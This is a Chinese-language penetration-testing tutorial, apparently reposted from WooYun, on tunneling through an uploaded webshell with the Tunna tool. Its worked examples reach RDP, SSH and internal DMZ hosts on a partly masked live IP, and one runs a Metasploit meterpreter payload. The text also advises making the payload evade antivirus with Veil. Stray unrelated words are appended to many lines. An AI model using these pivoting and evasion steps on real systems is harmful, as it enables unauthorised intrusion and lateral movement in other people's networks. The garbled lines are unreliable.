tunna工具使用實例

原理:就是個HTTP tunneling工具

224402543.jpg

能夠看出該工具先使用proxy.py監聽本地一個端口,而後鏈接部署在遠程WEB的webshell,遠端的webshell會把端口轉發請求轉發到本地或者本地內網遠程的主機,從而實現HTTP tunneling.這對於內網***來講,是頗有用的一個工具.php

該工具看起來是否是有似曾相識的感受,恩.其實和reduh原理是同樣的,不過tunna更穩定,速度更快.python

下載地址是:linux

http://www.secforce.com/media/tools/tunna_v0.1.zip(博文附件已備份)web


下面講解4個實例,就能掌握該工具使用方法了.shell

實例1:

網站對外只開放了80端口,其餘的端口都是關閉的,經過CVE-2013-225獲得JSP的WEBSHELL後,上傳conn.jsp,作轉發,實現鏈接本機的其餘端口.windows

直接掃描發現3389是關閉的python2.7

mickey@pentest:~# nmap -sS -p3389 219.x.x.x
Starting Nmap 6.40 ( http://nmap.org ) at 2013-09-26 22:47 EDT
Nmap scan report for 219.x.x.x
Host is up (0.0088s latency).
PORT     STATE SERVICE
3389/tcp close


經過webshell上傳conn.jsp到主機上,本地開始鏈接ssh

python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 3389 -v


參數含義以下:jsp

-l 表示本地監聽的端口
-r 遠程要轉發的端口
-v 詳細模式

而後本地執行:tcp

rdesktop 127.0.0.1:1234

就能夠鏈接到目標的3389了

225125396.jpg

實例2:

對於有些服務,好比SSH,還須要添加-s參數,才能保證鏈接的時候不會中斷.

python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 22 -v -s
ssh localhost -p 1234

225243980.jpg


實例3:

場景:已經獲得DMZ區的一臺主機的JSPSHELL,該主機的內網IP是172.16.100.20,經過查點,發現DMZ區還有其餘的主機(172.16.100.20),而且開放了3389,咱們想利用HTTP tunneling,鏈接到172.16.100.20的3389,命令以下


python2.7 proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -a 172.16.100.20 -r 3389

這裏多了一個-a參數,意義是要轉發的IP

實例4:

對於喜歡metasploit的朋友,該工具也支持,不過若是對方有殺軟的話,建議先用veil作好meterpreter的免殺.

首先把tunna_exploit.rb拷貝到msf的modules/exploits/windows/misc目錄.

 
 
cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc

而後開始利用

 
 
msf > use exploit/windows/misc/tunna_exploit
msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(tunna_exploit) > set RHOST 1.3.3.7  <-- 注意這裏是指本地的公網IP
RHOST => 1.3.3.7
msf exploit(tunna_exploit) > set TARGETURI http://219.x.x.x:8080/conn.jsp
TARGETURI => http://219.x.x.x:8080/conn.jsp
msf exploit(tunna_exploit) > set VERBOSE true
VERBOSE => true
msf exploit(tunna_exploit) > exploit -j

tunna除了支持jsp還支持如下環境和腳本

conn.jsp Tested on Apache Tomcat (windows + linux)
conn.aspx Tested on IIS 6+8 (windows server 2003/2012)
conn.php Tested on LAMP + XAMPP + IIS (windows + linux)

使用的時候須要注意:metasploit裏的腳本只對應metasploit使用.


轉載自WooYun知識,原文地址:http://drops.wooyun.org/tools/650

做者:mickey

相關文章
相關標籤/搜索